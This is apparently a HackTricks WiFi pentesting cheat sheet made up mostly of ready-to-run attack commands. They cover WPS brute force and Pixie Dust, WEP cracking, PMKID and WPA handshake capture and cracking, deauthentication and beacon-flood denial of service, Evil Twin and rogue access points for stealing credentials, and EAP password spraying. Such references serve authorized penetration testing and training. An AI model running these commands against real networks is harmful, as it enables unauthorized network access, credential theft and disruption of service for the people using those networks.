Documentation Index
Fetch the complete documentation index at: https://mintlify.com/HackTricks-wiki/hacktricks/llms.txt
Use this file to discover all available pages before exploring further.
Basic WiFi Commands
ip link show # List available interfaces
airmon-ng check kill # Kill interfering processes
airmon-ng start wlan0 # Enable monitor mode
airmon-ng stop wlan0mon # Disable monitor mode
airodump-ng wlan0mon # Scan 2.4 GHz networks
airodump-ng wlan0mon --band a # Scan 5 GHz networks
airodump-ng wlan0mon --wps # Show WPS-enabled APs
iw dev wlan0 scan | grep "^BSS\|SSID\|WPA" # Quick scan summary
Airgeddon
All-in-one bash script covering WEP, WPA-PSK, WPS, Evil Twin, and Enterprise attacks with a guided menu.docker run --rm -ti --name airgeddon \
--net=host --privileged -p 3000:3000 \
v1s1t0r1sh3r3/airgeddon
EAPHammer
Focused on WPA-Enterprise attacks, EAP downgrade, and credential capture.git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
Wifite2
Automates WPS/WEP/WPA-PSK attacks: sets monitor mode, scans, selects targets, and runs appropriate attacks.
wifiphisher
Performs Evil Twin, KARMA, and Known Beacons attacks combined with phishing templates to capture PSKs or portal credentials.
WPS Attacks
WPS (Wi-Fi Protected Setup) uses an 8-digit PIN validated in two halves, giving only ~11,000 effective combinations.
WPS Brute Force
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
WPS Pixie Dust Attack
Some APs use predictable nonces (E-S1, E-S2), making the WPS PIN recoverable offline:
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
# Without monitor mode
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37
Null PIN Attack
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
WEP
WEP is broken due to the tiny 24-bit IV space, RC4 keystream reuse, and unkeyed CRC32 integrity. A practical break:
# Collect IVs
airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon
# Speed up with ARP replay
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
# Crack with PTW attack
aircrack-ng wep_capture-01.cap
WPA/WPA2 PSK
PMKID Attack (No Client Needed)
Capture a single EAPOL frame from the AP — no connected client required:
airmon-ng check kill && airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git && cd hcxdumptool && make && make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
# Convert and crack
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
WPA Handshake Capture
# Monitor the target AP
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
# Force re-authentication via deauth
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0
# Crack the captured handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
WPA Enterprise (MGT)
EAP Authentication Methods
Sends the MD5 hash of the password. Not recommended — vulnerable to dictionary attacks and provides no server authentication.
Uses both client-side and server-side certificates. Strong when certificates are properly managed.
Creates a TLS tunnel, then authenticates via MSCHAPv2 inside. The most common enterprise method — the MSCHAPv2 challenge can be captured and cracked.
Provides mutual authentication through an encrypted tunnel. Only server-side certificates required; client uses credentials.
Username Capture
Even with PEAP-EAP-TLS, usernames are sent in plaintext in the EAP “Response Identity” message:
# Capture auth with airodump + wireshark, then filter:
# Display filter: eapol
# Look for "Response, Identity" packet
Enterprise Evil Twin
# Generate certificates
./eaphammer --cert-wizard
# Launch EAP Evil Twin
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
EAP Brute-Force (Password Spray)
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 \
--essid example-wifi \
--password bananas \
--user-list users.txt
DoS Attacks
# Deauthentication attack (aireplay-ng)
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
# Beacon flooding (create fake APs)
mdk4 wlan0mon b -a -w nta -m
# EAPOL flooding
mdk4 wlan0mon e -t EF:60:69:D7:69:2F
Evil Twin & Rogue AP Attacks
Open Evil Twin
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
WPA/WPA2 Evil Twin
Lure clients with a matching SSID and WPA2. Without the PSK the 4-way handshake will not complete, but you can capture it for cracking../eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
Enterprise Evil Twin
Downgrade authentication to capture credentials:./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
KARMA, MANA, and Known Beacons
| Attack | Description |
|---|
| KARMA | Rogue AP responds to all probe requests, tricking devices into connecting |
| MANA | Captures PNLs from broadcast probes and responds with known SSIDs |
| Loud MANA | Broadcasts responses for all ESSIDs seen in nearby devices’ PNLs |
| Known Beacons | Brute-forces ESSID list, responding to any name in a wordlist |
# MANA attack
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt
# Known Beacons
./eaphammer -i wlan0 --mana --known-beacons --known-ssids-file wordlist.txt
References
